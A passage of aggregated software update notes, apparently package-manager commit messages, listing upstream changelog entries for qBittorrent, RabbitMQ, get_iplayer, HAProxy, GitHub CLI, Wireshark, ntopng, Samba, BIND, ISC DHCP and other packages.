- BUGFIX: Move a few torrent context menu actions into "Torrent options" dialog (thalieht)
- BUGFIX: Allow deselecting radio buttons in "Torrent options" for mixed torrents (thalieht)
- BUGFIX: Apply file priority changes correctly (a-sum-duma, Chocobo1)
- BUGFIX: Use proper string for Korean language (OctopusET)
- BUGFIX: Disable "add peers" menu items instead of hiding it (Chocobo1)
- BUGFIX: Disable system tray icon menu when app is exiting (Chocobo1)
- BUGFIX: Show GUI lock icon after system tray icon is initialized (Chocobo1)
- BUGFIX: Apply selected layout to displayed torrent content in "Add New Torrent" dialog (glassez)
- WEBUI: Add reverse proxy source IP resolution (HiFiPhile)
- WEBUI: Support navigating UI tables with arrow keys (Thomas Piccirello)
- WEBUI: Support expanding/collapsing UI folders with arrow keys (Thomas Piccirello)
- WEBUI: Support sorting UI tables via touch (Tom Piccirello)
- WEBUI: Add pieces progress bar to General tab (Jesse Smick)
- WEBUI: Update authors page (Chocobo1)
- WEBUI: Set icon sizes attribute (Daniel Aleksandersen)
- WEBUI: Add meta application name (Daniel Aleksandersen)
- WEBUI: Sort WebUI language selection values (Chocobo1)
- WEBUI: Use correct URL scheme in user prompt when HTTPS is enabled (Chocobo1)
- RSS: Stick Unread row to top in RSS feed list (Prince Gupta)
- RSS: Correctly use fallback icons for RSS feed in GUI (jagannatharjun)
- SEARCH: Add context menu for tabs in search widget (Anton)
- SEARCH: Add more download options to torrent search result right-click menu (a-sum-duma)
- WINDOWS: Add windows-clang support (Biswapriyo Nath)
- WINDOWS: Update python installer URL for Windows (xavier2k6)
- WINDOWS: NSIS: Update Simplified Chinese translation (Losiki)
- LINUX: Prolong wait time for shutdown for qbittorrent-nox (Chocobo1)
- LINUX: Install vector program icon (Chocobo1)
- LINUX: Add detection for OpenBSD, Haiku in configure script (Chocobo1)
- MACOS: Update Mac icons for Big Sur (17jiangz1)
- EXPERIMENTAL: Setting to store/load fastresume/torrent files in an SQLite database (glassez)
- OTHER: Many internal code refactorings and bug fixing by many people
libtorrent-2.0.6
fix issue creating a v2 torrent from torrent_info containing an empty file
make recheck files also update which files use partfile
add write_through disk_io_write_mode, which flushes pieces to disk immediately
improve copy file function to preserve sparse regions (when supported)
add function to truncate over-sized files part of a torrent
fix directory creation on windows shared folders
add flag to make add_files() not record file attributes
deprecate (unused) allow_partial_disk_writes settings
fix disk-full error reporting in mmap_disk_io
fixed similar-torrents feature for v2 torrents
fix potential unbounded recursion in add_completed_job, in disk I/O
deprecated (unused) volatile_read_cache setting
fix part files being marked as hidden on windows
- Check error is not nil before calling a function on it
- Add support for multiple unix socket forwards over ssh
Also normalize WRKSRC handling and adapt patch accordingly.
RabbitMQ 3.9.15
Core Server
Bug Fixes
Stream delivery rate could drop if concurrent stream consumers consumed in a way
that made them reach the end of the stream often.
If a cluster that had streams enabled was upgraded with a jump of multiple
patch releases, stream state could fail an upgrade.
Significantly faster queue re-import from definitions
on subsequent node restarts. Initial definition import still takes
the same amount of time as before.
Priority queues could run into an exception in some cases.
Maintenance mode could run into a timeout during queue leadership transfer.
Prometheus Plugin
Bug Fixes
Prometheus collector could run into an exception early on node's
schema database sync.
Management Plugin
Bug Fixes
Connection data transfer rate units were incorrectly displayed when
rate was less than 1 kiB per second.
rabbitmqadmin now correctly loads TLS-related keys from its configuration file.
Corrected a help message for node memory usage tool tip.
LDAP Plugin
Enhancements
More Erlang 24.3's eldap library compatibility improvements.
New in version 4.2
==================
Enhancements
------------
* Add support for NTPv4 extension field improving synchronisation
stability and resolution of root delay and dispersion (experimental)
* Add support for NTP over PTP (experimental)
* Add support for AES-CMAC and hash functions in GnuTLS
* Improve server interleaved mode to be more reliable and support
multiple clients behind NAT
* Update seccomp filter
* Add statistics about interleaved mode to serverstats report
Bug fixes
---------
* Fix RTC support with 64-bit time_t on 32-bit Linux
* Fix seccomp filter to work correctly with bind*device directives
* Suppress kernel adjustments of system clock (dosynctodr) on illumos
Other changes
-------------
* Switch Solaris support to illumos
It's better to generate these lists from the resulting package to be
installed via DESTDIR, rather than the ingoing source, as not everything
found in the latter is installed. (The sed command also doesn't work
with BSD sed as intended, but that's left as-is.)
pkgsrc: Fetch source from main repository and not from github mirror. This will
avoid missing updates again due to non-mirrored releases.
0.7.0
-updated dependencies, added new -k flag. Fixes#5
0.6.8
-trying to circumvent new WatchMDH structures (yet incomplete)
0.6.7
-Now that we use the new YouTube API, the need for cipher decoding should be a
thing of the past.
Addresses PR pkg/56787 from Chris Branton. (It looks like the list of
config files simply wasn't kept up to date. Partly that's because the
example code to generate the list wasn't looking for symlinks.)
get_iplayer 3.29 Release Notes
Changes in 3.29
There is a breaking change in this release
* Fixed bug that caused searches to fail when target episode title in
cache contained vertical bar (|) characters. Vertical bars now
converted to hyphens.
* Adjusted stream classification to accommodate BBC changes
* 960x540@25 streams are apparently no longer provided for
programmes first broadcast after approximately 2021-12-05. The
are still available for older programmes, including recent
repeats.
* 960x540@25 streams for new programmes have been replaced by
960x540@50 streams with the same bit rate. get_iplayer now
detects these lower-bitrate 50fps streams and classifies them
appropriately. Use --tv-lower-bitrate to prefer those streams if
they are available. The file sizes should be roughly the same as
the previous 25fps streams. You do not need to change your
preferences.
* Restored BBC Three schedules to the programme indexing to accomodate
its return as a broadcast channel. Perform a full rebuild of the TV
programme index cache if you want to ensure it includes all supported
BBC Three programmes:
get_iplayer --rebuild-cache
Ignore these warnings, as there were no BBC Three schedule listings
for that week:
WARNING: Got 0 programmes for BBC Three schedule page (HTML): https://www.bbc.co.uk/schedules/p00fzl95/2022/w01
WARNING: Failed to parse BBC Three schedule page: https://www.bbc.co.uk/schedules/p00fzl95/2022/w01
* Options related to recording quality have been changed
* Some command iine parameters have been renamed:
Old New Option Key
--modes --quality modes
--tv-mode --tv-quality tvmode
--radio-mode --radio-quality radiomode
--fps25 --tv-lower-bitrate fps25
The old command-line option names are scheduled for removal in
the next release. The option keys (used in preferences, presets,
and PVR searches) remain the same, so recording quality settings
in existing preferences, presets, and PVR searches will continue
to work.
* The possible recording quality settings have been reduced to:
Type Quality Settings Aliases Default
TV fhd,hd,sd,web,mobile 1080p,720p,540p,396p,288p hd,sd,web,mobile
Radio high,std,med,low 320k,128k,96k,48k high,std,med,low
In the next release, it will be a fatal error to enter an invalid
quality setting on the command line. Aliases can be used
interchangeably with their corresponding alphabetic codes. The
two substantive changes are that TV "high" quality is now "web",
and TV "low" quality is now "mobile". This makes TV and radio
quality settings distinct sets that can be mixed unambiguously
for --quality and the Web PVR Manager. All recording quality
settings that cannot be translated into values from the lists
above are discarded. See Recording Quality for further
information. See below for more information about the "fhd"
quality setting.
* BREAKING CHANGE: Existing quality settings (or recording modes)
saved in preferences, presets, and PVR searches will be
translated into new quality settings in a backwards-compatible
manner, with one exception. If your saved values have prefixes
denoting stream format (hls,hvf,had,dash,dvf,daf), or numeric
suffixes for specific streams, those prefixes and suffixes are
now stripped and ignored. You should never use numeric suffixes
since they are non-deterministic. In the unlikely event you need
to restrict the stream formats to record, use the new
--exclude-format option. --exclude-format=dash will exclude
MPEG-DASH streams, and --exclude-format=hls will exclude HLS
streams.
* If you have not specifed at least one of sd,web,high with
--tv-quality when downloading an audiodescribed programme,
get_iplayer will now insert those quality settings to ensure a
stream is available. HD is not available for audiodescribed
programmes.
* Changes to programme metadata fields
* No longer included in XML/JSON metadata files: durations,
geoblocked, modes, modesizes, unavailable, verpids, versions. Use
--info to see available version-dependent metadata values.
* Now included in XML/JSON metadata files: quality, verpid
* No longer displayed with --info unless --verbose is also
specified: modes, modesizes
* Now displayed with --info: qualities, qualitysizes
* Changes to application options
* --purge-files has been removed.
* --trim-history and --no-purge are now ignored and will be removed
in the next release. You can remove them from your preferences
with:
get_iplayer --prefs-del --trim-history=0 --no-purge
get_iplayer will no longer issue a warning to remove downloaded
programmes more than 30 days old.
* EXPERIMENTAL: Full HD streams (1080p)
* Before anyone asks: UHD 4k streams are still not available to
get_iplayer.
* get_iplayer now attempts to generate 1920x1080@50 ("fhd") stream
URLs for every programme that has 1280x720@50 ("hd") streams (so
no audiodescribed programmes). The purpose of these 1080p streams
is not known. They may be used for some smart TVs or set-top
boxes, or they may be a BBC experiment.
* It is not a bug if "fhd" streams are not available for a
programme. Do not depend on the presence of these streams. They
may disappear at any time. They are provided solely for you to
experiment with if you find them useful. You may decide that the
video quality of "fhd" streams does not justify their extra
download and storage requirements.
* The "fhd" streams are not included by default, nor are they
included when expanding the obsolete "best" shortcut if it is
saved in your preferences, presets, or PVR searches. You must
request "fhd" downloads specifically with --tv-quality=fhd or
--tv-quality=1080p. This is done in part to avoid resource shock
for the presumed majority of users who don't read release notes
and documentation, but also because the quality of "fhd" streams
varies greatly. If you wish to include "fhd" in your default
settings, save it in your preferences:
get_iplayer --prefs-add --tv-quality=fhd,hd,sd,web,mobile
* The bit rates for the "fhd" streams can vary quite a bit between
programmes. The maximum appears to be around 10 Mb/s (though most
are far lower), so output files could be up to ~90% larger than
their "hd" equivalents, in the region of 3.8 GB/hr for video.
Most will have far lower bit rates, sometimes lower than their
"hd" equivalents, likely due to more sophisticated compression
techniques being employed.
* Because of the method used to access the "fhd" streams,
get_iplayer can't estimate their actual bit rates, so it assumes
8 Mb/s, the value advertised in iPlayer metadata. Consequently,
file size estimates and download progress reports may be quite
far off.
* It has been observed in initial testing that MPEG-DASH "fhd"
downloads are much faster than HLS equivalents, so MPEG-DASH
streams are tried first, while the opposite is true for non-"fhd"
streams. This makes no difference to the output. The extra
post-processing time required for MPEG-DASH is more than offset
by the faster download. You can test the difference with
--tv-quality=fhd --exclude-format=hls and --tv-quality=fhd
--exclude-format=dash.
RabbitMQ 3.9.14
Changes Worth Mentioning
Core Server
Bug Fixes
Restart of a node that hosted one or more stream leaders resulted in
their consumers not "re-attaching" to the newly elected leader.
Large fanouts experienced a performance regression when streams were not
enabled using a feature flag.
Stream management plugin did not support mixed version clusters.
Stream deletion did not result in a basic.cancel being sent to AMQP 0-9-1 consumers.
Stream clients did not receive a correct stream unavailability error in some
cases.
It is again possible to clear user tags and update the password in a single operation.
Enhancements
Forward compatibility with Erlang 25.
File handle cache efficiency improvements.
Uknown stream properties (e.g. those requested by a node that runs a newer version)
are now handled gracefully.
Temporary hostname resolution issues (attempts that fail with nxdomain)
are now handled more gracefully and with a delay of several seconds.
Build time compatibility with Elixir 1.13.
OAuth 2 AuthN/AuthZ Backend Plugin
Bug Fixes
auth_oauth2.additional_scopes_key in rabbitmq.conf was not converted correctly
during configuration translation and thus had no effect.
LDAP AuthN/AuthZ Backend Plugin
Enhancement
Adapt to a breaking Erlang 24.3 LDAP client change.
Shovel Plugin
Enhacements
Shovels now can be declared with delete-after parameter set to 0.
Such shovels will immediately stop instead of erroring and failing to
start after a node restart.
Consul Peer Discovery Plugin
Enhancements
Support for Consul 1.1 response code changes
when an operation is attempted on a non-existent health check.
0.14.0 / 2022-04-05 Latest
[ENHANCEMENT] Continued typing improvements and coverage.
[ENHANCEMENT] Allow binding to IPv6 addresses.
[ENHANCEMENT] Negotiate gzip content-encoding, enabled by default.
[ENHANCEMENT] Allow disabling _created metrics via the PROMETHEUS_DISABLE_CREATED_SERIES environment variable.
[BUGFIX] Correct minor typo in exception raised when exemplar labels are too long.
0.13.1 / 2022-01-28
[BUGFIX] Relax some type constraints that were too strict.
[BUGFIX] Explicitly export functions with __all__.
0.13.0 / 2022-01-25
[CHANGE] Drop support for Python versions 2.7, 3.4, and 3.5.
[FEATURE] Support adding labels when using .time()
[ENHANCEMENT] Begin to add type hints to functions.
[ENHANCEMENT] Improved go-to-declaration behavior for editors.
[BUGFIX] Remove trailing slashes from pushgateway URLS.
[BUGFIX] Catch non-integer bucket/count values
2.5.5
- CI: github actions: add the output of $CC -dM -E-
- CI: github actions: use cache for OpenTracing
- CI: refactor OpenTracing build script
- CI: github actions: use cache for SSL libs
- CI: Consistently use actions/checkout@v2
- BUILD: atomic: make the old HA_ATOMIC_LOAD() support const pointers
- BUILD: tree-wide: mark a few numeric constants as explicitly long long
- BUG/MEDIUM: mux-fcgi: Don't rely on SI src/dst addresses for FCGI health-checks
- BUG/MEDIUM: htx: Fix a possible null derefs in htx_xfer_blks()
- REGTESTS: fix the race conditions in normalize_uri.vtc
- REGTESTS: fix the race conditions in secure_memcmp.vtc
- BUG/MEDIUM: httpclient/lua: infinite appctx loop with POST
- BUG/MINOR: pool: always align pool_heads to 64 bytes
- BUG/MEDIUM: pools: fix ha_free() on area in the process of being freed
- BUILD: fix kFreeBSD build.
- MINOR: pools: add a new global option "no-memory-trimming"
- MINOR: stats: Add dark mode support for socket rows
- BUILD: pools: fix backport of no-memory-trimming on non-linux OS
- BUILD: fix recent build breakage of freebsd caused by kFreeBSD build fix
- BUG/MINOR: add missing modes in proxy_mode_str()
- BUG/MINOR: cli: shows correct mode in "show sess"
- BUG/MINOR: httpclient: Set conn-stream/channel EOI flags at the end of request
- BUG/MINOR: hlua: Set conn-stream/channel EOI flags at the end of request
- BUG/MINOR: stats: Set conn-stream/channel EOI flags at the end of request
- BUG/MINOR: cache: Set conn-stream/channel EOI flags at the end of request
- BUG/MINOR: promex: Set conn-stream/channel EOI flags at the end of request
- BUG/MEDIUM: stream: Use the front analyzers for new listener-less streams
- DEBUG: cache: Update underlying buffer when loading HTX message in cache applet
- BUG/MEDIUM: mcli: Properly handle errors and timeouts during reponse processing
- DEBUG: stream: Add the missing descriptions for stream trace events
- DEBUG: stream: Fix stream trace message to print response buffer state
- BUG/MAJOR: mux-pt: Always destroy the backend connection on detach
- BUG/MINOR: session: fix theoretical risk of memleak in session_accept_fd()
- BUG/MEDIUM: httpclient: don't consume data before it was analyzed
- CLEANUP: htx: remove unused co_htx_remove_blk()
- BUG/MINOR: httpclient: consume partly the blocks when necessary
- BUG/MINOR: httpclient: remove the UNUSED block when parsing headers
- BUG/MEDIUM: httpclient: must manipulate head, not first
- REGTESTS: fix the race conditions in be2hex.vtc
Find your work across repositories
* Add gh status command
The status command displays issues and pull requests assigned to you from
anywhere on GitHub, as well as requests for your review, mentions of your
name, and notifications.
* gh search: Add search issues and search pull requests commands
Other New Features
* Add label list and label create commands
* Add ability to filter issue and pull request lists
* extension install: Add option to pin extensions to a version
* Add support for Dependabot secrets
* Add GH_DEBUG environment variable, deprecate DEBUG for verbose mode
Fixes
* Codespaces: Disallow some operations on codespaces that have a pending
operation
* Codespaces: Listen to agent port-forwarding events when forwarding ports
* cs ssh: remove unwanted trailing quote
* cs ssh: use setup example that should work with any ssh config
* cs cp: parse additional scp args
* cs create: rename repo permissions opt-out parameter
* pr view: respect GH_FORCE_TTY
* extension upgrade --all: do not throw an error if no extensions are
installed
* run download: fix extracting to root path
* pr create --web: fix escaping URL path components
* release list: fix "latest" release logic
* Text editor: only add UTF-8 BOM on Windows
* Bump github.com/AlecAivazis/survey/v2 from 2.3.2 to 2.3.4
Doesn't build, last release from 1999 and even then it said on the
homepage: "just a bunch of code thrown together and you can consider
yourself lucky it it goes as far as compiling."
Wireshark 3.6.3 Release Notes
What’s New
Bug Fixes
The following bugs have been fixed:
• Fuzz job crash output: fuzz-2022-01-19-7399.pcap Issue 17894[1].
• TLS dissector incorrectly reports JA3 values Issue 17942[2].
• "Wiki Protocol page" in packet details menu is broken - wiki
pages not migrated to GitLab? Issue 17944[3].
• Dissector bug, protocol PFCP display Flow Description IE value
error in Additional Flow Description of PFD Management Request
Message Issue 17951[4].
• Bluetooth: Fails to open Log file for SCO connection Issue
17964[5].
• Fuzz job crash output: fuzz-2022-03-07-10896.pcap Issue 17984[6].
• libwiretap: Save as ERF causes segmentation fault Issue 17989[7].
• HTTP server returning multiple early hints shows too many
responses in "Follow HTTP Stream" Issue 18006[8].
New and Updated Features
New Protocol Support
There are no new protocols in this release.
Updated Protocol Support
CSN.1, HTTP, IEEE 802.11, NTLM SSP, PFCP, PKTLOG, SSDP, TLS, and USB
HID
New and Updated Capture File Support
pcap and pcapng
New File Format Decoding Support
There is no new or updated file format support in this release.
ntopng 5.2 (February 2022)
Breakthroughs
* New ClickHouse support for storing historical data, replacing nIndex support (data migration available)
* Advanced Historical Flow Explorer, with the ability to define custom queries using JSON-based configurations
* New Historical Data Analysis page (including Score, Applications, Alerts, AS analysis), with the ability to define custom reports with charts
* Enhanced drill down from charts and historical flow data and alerts to PCAP data
* nEdge support for Ubuntu 20
* Enhanced support for Observation Points
Improvements
* Improve CPU utilization and memory footprint
* Improve historical data retention management for flows and timeseries
* Improve periodic activities handling, with support for strict and relaxed (delayed) tasks
* Improve filtering and analysis of the historical flows
* Improve alert explorer and filtering
* Improve Enterprise dashboard look and feel
* Improve the speedtest support and servers selection
* Improve support for ping and continuous ping (ICMP) for active monitoring
* Improve flow-direction handling
* Improve localization (including DE and IT translations)
* Improve IPS policies management
* Add IPS activities logging (e.g. block, unblock)
* Improve SNMP support
* Optimize polling of SNMP devices
* Improve SNMP v3 support
* Add more information including version
* Stateful SNMP alert to detect too many MACs on non-trunk
* Perform fat MIBs poll on average every 15 minutes
* Add preference to disable polling of SNMP fat MIBs
* Add more information to the historical flow data, including Latency, AS, Observation Points, SNMP interface, Host Pools
* Add detailed view of historical flows and alerts
* Add support for nProbe field L7_INFO
* Add ICMP flood alert
* Add Checks exclusion settings for subnets and for hosts and domains globally
* Add CDP support
* Add more regression tests
* Add support for obsolete client SSH version
* Add support for ERSPAN version 2 (type III)
* Add support for all the new nDPI Flow Risks added in nDPI 4.2
* Add extra info to service and periodicity map hosts
* Add Top Sites check
* REST API
* Getter for the bridge MIB
* Getter for LLDP adjacencies
* Check for BPF filters
* Score charts timeseries and analysis
Changes
* Encapsulated traffic is accounted for the lenght of the encapsulated packet and not of the original packet
* Remove nIndex support, including the flow explorer
* Remove MySQL historical flow explorer (export only)
* Hide LDAP password from logs
Fixes
* Fix a few memory leaks, double free, buffer overflow and invalid memory access
* Fix SQLite initialization
* Fix support for fragmented packets
* Fix IP validation in modals
* Fix netplan configuration manager
* Fix blog notifications
* Fix time range picker to support all browsers
* Fix binary application transfer name in alerts
* Fix glitches in chart drag operations
* Fix pools edit/remove
* Fix InfluxDB timeseries export
* Fix ELK memory leak
* Fix TLS version for obsolete TLS alerts when collecting flows
* Fix fields conversion in timeseries charts filters
* Fix some invalid nProbe field mapping
* Fix hosts Geomap
* Fix slow shutdown termination
* Fix wrong Call-ID 0 with RTP streams with no SIP stream associated
* Fix ping support for FreeBSD
* Fix active monitoring interface list
* Fix host names not always shown
* Fix host pools stats
* Fix UTF8 encoding issues in localization tools
* Fix time/timezone in forwarded syslog messages
* Fix unknown process alert
* Fix nil DOM javascript error
* Fix country not always shown in flow alerts
* Fix non-initialized traffic profiles
* Fix traffic profiles not working over ZMQ
* Fix syslog collection
* Fix async SNMP calls blocking the execution
* Fix CPU stats timeseries
* Fix InfluxDB attempts to alwa re-create retention policies
* Fix REST API ts.lua returning 24h data
* Fix processing of DNS packets under certain conditions
* Fix invalid space in SNMP Hostnames
* Fix REST API incompat. (/get/alert/severity/counters.lua, /get/alert/type/counters.lua)
* Fix map layout not saved correctly
* Fix LLDP topology for Juniper routers
* Fix not authorized error when editing SNMP devices
* Fix double 95perc, splitted avg and 95perc in sent/rcvd in charts
* Fix inconsistent local/remote timeseries
* Fix Risks generation in IPS policy configuration
* Fix deletion of sub-interface
* Fix deadline not honored when monitoring SNMP devices
* Fix traffic profiles on L7 protocols
* Fix TCP connection refused check
* Fix failures when the DB is not reacheable
* Fix segfault with View interfaces
* Fix hosts wrongly detected as Local
* Fix missing throughputs in countries
Misc
* Enforces proxy exclusions with env var `no_proxy`
* Move Lua engine to 5.4
* Major code review and cleanup
nEdge
* Add support for Ubuntu 20
* Add ability to logout when using the Captive Portal
* Add per egress interface stats and timeseries
* Add active DHCP leases in UI and REST API
* Add daily/weekly/monthly quotas
* Add service and periodicity maps and alerts
* Fix Captive Portal not working due to invalid allowed interface
* Fix addition of static DHCP leases
* Fix factory reset
* Fix reboot button
ntopng 5.0 (August 2021)
Breakthroughs
* Advanced alerts engine with security features, including the detection of [attackers and victims](https://www.ntop.org/ntopng/how-attackers-and-victims-detection-works-in-ntopng/)
* Integration of 30+ [nDPI security risks](https://www.ntop.org/ndpi/how-to-spot-unsafe-communications-using-ndpi-flow-risk-score/)
* Generation of the `score` [indicator of compromise](https://www.ntop.org/ntopng/what-is-score-and-how-it-can-drive-you-towards-network-issues/) for hosts, interfaces and other network elements
* Ability to collect flows from hundredths of routers by means of [observation points](https://www.ntop.org/nprobe/collecting-flows-from-hundred-of-routers-using-observation-points/)
* Anomaly detection based on Double Exponential Smoothing (DES) to uncover possibly suspicious behaviors in the traffic and in the score
* Encrypted Traffic Analysis (ETA) with special emphasis on the TLS to uncover self-signed, expired, invalid certificates and other issues
New features
* Ability to configure alert exclusions for individual hosts to mitigate false positives
* FreeBSD / OPNsense / pfSense [packages](https://packages.ntop.org/)
* Ability to see the TX/RX traffic breakdown both for physical interfaces and when receiving traffic from nProbe
* Add support for ECS when exporting to Syslog
* Improved TCP analysis, including analysis of TCP flows with zero window and low goodput
* Ability to send alerts to Slack
* Implementation of a token-based REST API access
Improvements
* Reworked the execution of hosts and flows checks (formerly user scripts), yielding a reduced CPU load of about 50%
* Improved 100Kfps+ [NetFlow/sFlow collection performance](https://www.ntop.org/nprobe/netflow-collection-performance-using-ntopng-and-nprobe/)
* Drilldown of [nIndex](https://www.ntop.org/guides/ntopng/advanced_features/flows_dump.html#nindex) historical flows much more flexible
* Migration to Bootstrap 5
* Check malicious JA3 signatures against all TLS-based protocols
* Reworked Doh/DoT handling
Fixes
* Fixes SSRF and stored-XSS injected with malicious SSDP responses
* Fixes several leaks in NetworkInterface
Notes
* To ensure optimal performance and scalability and to prevent uneven resource utilization, the maximum number of interfaces handled by a single ntopng instance has been reduced to
* 16 (Enterprise M)
* 32 (Enterprise L)
* 8 (all other versions)
* REST API v1/ is deprecated and will be dropped in the next stable release in favor of REST API v2/
* The old alerts dashboard has been removed and replaced by an advanced alerts drilldown page with integrated charts
Changes since 4.15.5
--------------------
* BUG 14169: Renaming file on DFS root fails with
NT_STATUS_OBJECT_PATH_NOT_FOUND.
* BUG 14737: Samba does not response STATUS_INVALID_PARAMETER when opening 2
objects with same lease key.
* BUG 14938: NT error code is not set when overwriting a file during rename
in libsmbclient.
* BUG 14996: Fix ldap simple bind with TLS auditing.
* BUG 14674: net ads info shows LDAP Server: 0.0.0.0 depending on contacted
server.
* BUG 14979: Problem when winbind renews Kerberos.
* BUG 8691: pam_winbind will not allow gdm login if password about to expire.
* BUG 14971: virusfilter_vfs_openat: Not scanned: Directory or special file.
* BUG 13631: DFS fix for AIX broken.
* BUG 14974: Solaris and AIX acl modules: wrong function arguments.
* BUG 7239: Function aixacl_sys_acl_get_file not declared / coredump.
* BUG 14900: Regression: Samba 4.15.2 on macOS segfaults intermittently
during strcpy in tdbsam_getsampwnam.
* BUG 14989: Fix a use-after-free in SMB1 server.
* BUG 14968: smb2_signing_decrypt_pdu() may not decrypt with
gnutls_aead_cipher_decrypt() from gnutls before 3.5.2.
* BUG 14984: changing the machine password against an RODC likely destroys
the domain join.
* BUG 14993: authsam_make_user_info_dc() steals memory from its struct
ldb_message *msg argument.
* BUG 14995: Use Heimdal 8.0 (pre) rather than an earlier snapshot.
* BUG 14967: Samba autorid fails to map AD users if id rangesize fits in the
id range only once.
Upstream changes:
1.160000 2022-02-01 11:41:36-07:00 America/Denver
- Preserve incremental version release numbers.
The previous release number can be consider being
lower than 1.151940
1.16 2022-01-28 16:29:44-07:00 America/Denver
- Add Kosovo to the list of supported countries
- Add get_all_countries helper
- Remove Memoize dependency and make Faster faster
2.0.3
Fix anyio exception handling
2.0.2
Fixed 14 anyio.BrokenResourceError has no attribute 'strerror'
2.0.1
?
2.0.0
Added anyio backend
Added new (v2) API for sync and trio backends
The code base has been completely redesigned
--- 9.16.27 released ---
5818. [security] A synchronous call to closehandle_cb() caused
isc__nm_process_sock_buffer() to be called recursively,
which in turn left TCP connections hanging in the
CLOSE_WAIT state blocking indefinitely when
out-of-order processing was disabled. (CVE-2022-0396)
[GL #3112]
--- 9.11.37 released ---
5817. [security] The rules for acceptance of records into the cache
have been tightened to prevent the possibility of
poisoning if forwarders send records outside
the configured bailiwick. (CVE-2021-25220) [GL #2950]
GitHub CLI 2.6.0
Repo Search
@samcoe is working on a new command, gh search! In this release it's shipping
with just support for repository searching. Results can then be processed with
--jq or fillter columns with --json and filters are expressed with flags like
--topic or --license.
Try it out with something like: gh search repos --language=go
--good-first-issues=">=10"!
Rerun failed jobs
gh run rerun has been augmented with two new flags: --failed and --job by @cdb.
You can now selectively rerun just failed jobs from a given workflow run!
Running gh run rerun --failed will prompt you to select a run to work with.
Codespaces Updates
* Allow Editing Codespaces
* Updates wording for codespaces accept permissions flow
* Add VSCS Target to gh cs list
* Adds internal codespace developer flags
* Add --profile option to gh cs cp
Other New Features
* add interactive repository edit functionality
* Support setting Dependabot secrets
* Add version to extension list command
* after merge, switch to base branch if available
Bugfixes
* pr close skips deleting local branch if not in a git repo
* pr checks: fix error message when no checks were found
* Fixed permission for workflow
GitHub CLI 2.5.2
ls alias now available for all commands
All places where a list subcommand is defined now support an ls alias, so gh pr
ls to your heart's content.
Better handling of oauth scopes
Thanks to @mario-campos we now properly understand implied auth scopes, fixing
some instances where gh insisted you needed additional scopes when you did not.
Other Bugfixes
* Fix HexToRGB panic
Other Changes
* Support filtering PRs authored
* gh auth login: added flags to partially automate flow
* Codespaces Create: Allow Accepting Permissions
GitHub CLI 2.5.1
New features
* Add display name to codespaces prompts and JSON output
* Add pr checks --watch flag
Fixes
* auth login --with-token: fix authenticating git operations
* release create: respect discussion category when creating a release with
assets
* gist create: handle Windows-style file paths
* release create: warn about unpushed local git tag
* Ignore EPIPE errors when writing to a closed pager
* Rotate our Windows code-signing certificates
Documentation fixes
* repo edit: clarify passing false for boolean flags
* Spelling correction in error message
GitHub CLI 2.5.0
New Features
* Add codespace ssh --config to generate OpenSSH host configuration for your
codespaces
* Add release delete-asset to delete an asset from a release
* Add repo deploy-key commands to manage deploy keys for a repository
* Improve the interactive issue/pull request assignee prompt
* auth login/refresh: allow non-interactive flow
* auth git-credential: add ability to authenticate git operations for gist
repositories
* gist edit: add ability to edit gist description
* gist edit: enable editing file contents via standard input
* pr status: show number of approvals
* repo fork: add ability to define the name of the fork repository on GitHub
* run list: add branch and actor filters
* run view: include job ID parameter in the suggested command invocation
* api: do not apply jq filters or render templates for HTTP error responses
* pr create: fetch pull request template contents via the API
* codespace create: provide repo suggestions after typing a few characters
and pressing Tab
Fixes
* release create: bring back interactive option to create a release from an
annotated tag
* workflow enable: allow enabling a workflow that was disabled due to
inactivity
* extension install: update wording for extensions that cannot be installed
* api: respect GH_REPO when substituting {owner}/{repo}
* issue list: fix filtering issues
* pr create: fix creating pull requests from numerical branch names
* repo fork: respect explicitly configured git_protocol when adding a git
remote for a fork
* pr checks: avoid reporting results of stale check runs
* secret set: trim trailing newlines when passing secret values via standard
input
* Preserve hard line breaks in rendered Markdown
* Handle SAML enforcement challenge from the server
* Add retry functionality to the Codespaces API client
* Add GH_HOST to hosts list if set in the environment
* Standardize pager output across commands
* Fix error message when running external commands
Other Changes
* Improve Survey stubber for tests
* Add Alpine Linux install docs
* Amend location of GPG key file
* Fix flaky Liveshare session test
* Add consistent punctuation in command usages
* Add install instructions for Void Linux
GitHub CLI 2.4.0
New features
* Add repo edit command
* release create: add --generate-notes functionality
* release create: add interactive mode to choose a tag name
* pr merge: allow editing commit subject
* secret set: allow importing secrets from a dotenv file
* run list/view: add --json export functionality
* Refresh man pages
* Add installation instructions for pkgsrc
Fixes
* pr view: ensure that PR reviews are always rendered in --comments mode
* api: handle HTTP 409 error message from the server
* issue edit: fix race condition when updating labels
* browse: support --commit with the repo override flag
* repo create: fix printing repo URL in no-TTY mode
* repo sync: use the new merge-upstream API if available
* run: display and treat "Cancelled" status as a failure
* extension upgrade: an already up-to-date extension should not a produce a
failure
* Avoid showing non-open PRs as related to the default branch
* git remotes: fix treating ssh.github.com as a github.com host
7.1.5:
Add AssumeRoleWithCertificate credential provider.
7.1.4:
docs: fix typo in object_lock config function name
fix progress bar division by zero error
Add policy unset method to minio admin
fix: lint checks and enable MINIO_CI_CD=1 for functional tests
Internet Systems Consortium DHCP Distribution
Version 4.4.3
9 March 2022
Release Notes
NEW FEATURES
Please note that that ISC DHCP is licensed under the Mozilla Public
License, MPL 2.0. Please see https://www.mozilla.org/en-US/MPL/2.0/ to read
the MPL 2.0 license terms.
NOTE: The client and relay components are now End-Of-Life.
4.4.3 is the final release for those components.
For information on how to install, configure, and run this software, as
well as how to find documentation and report bugs, please consult the
README file.
ISC DHCP uses the standard GNU configure command for installation. Please review the
output of `./configure --help` to see what options are available.
The system has only been tested on Linux and FreeBSD, and may not work on
other platforms. Please subscribe to the dhcp-users mailing list at
https://lists.isc.org/mailman/listinfo/dhcp-users and report any problems
and/or suggested fixes to dhcp-users@lists.isc.org.
ISC DHCP is open source software maintained by Internet Systems
Consortium. This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com).
Changes since 4.4.2-P1 (New Features)
- Two new OMAPI function calls were added, `dhcpctl_timed_connect()`
and `dhcpctl_timed_wait_for_completion()`. These provide timed
versions of creating a connection and waiting for an operation
to complete.
[GitLab #76]
- The BIND libraries have been updated to the latest version, 9.11.36. This fixes a number
of compilation issues on various systems, including OpenWRT. Thanks to
Philip Prindeville for testing on OpenWRT.
[GitLab #218, #171, #180, #192]
- Support was added for the new DHCPv4 option v6-only-preferred, specified
in RFC 8925. A new reason code, V6ONLY, was added to the client script
and the client Linux script sample was updated.
[GitLab #132]
Changes since 4.4.2-P1 (Bug Fixes)
- Minor corrections were made to allow compilation under gcc 10.
